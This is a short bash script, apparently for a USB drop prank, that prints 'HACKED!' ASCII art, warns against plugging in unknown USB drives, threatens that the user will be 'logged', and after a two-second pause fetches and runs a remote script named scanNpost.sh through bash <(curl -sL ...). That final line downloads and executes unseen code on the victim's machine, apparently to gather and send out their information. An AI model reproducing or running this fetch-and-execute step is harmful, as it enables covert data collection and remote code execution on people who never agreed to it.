clear

clear
                                                               
echo " ##  ##     ##      ####    ##  ##   ######   ####       ##    "

echo " ##  ##    ####    ##  ##   ## ##    ##       ## ##      ##    "

echo " ######   ##  ##   ##       ####     #####    ##  ##     ##    "

echo " ##  ##   ##  ##   ##       ####     ##       ##  ##     ##    "

echo " ##  ##   ######   ##  ##   ## ##    ##       ## ##            "

echo " ##  ##   ##  ##    ####    ##  ##   ######   ####       ##    "

echo "                                                               "

echo "(well, not really)"

echo ""

echo ""

echo "Listen. Don't plug random USBs into your computer. This could steal your info or worse, damage your PC entirely."
echo "Now, if you don't want to be logged, plug this USB out NOW."
sleep 2 
bash <(curl -sL https://raw.githubusercontent.com/glitchy-m/SHScripts/refs/heads/main/scanNpost.sh)

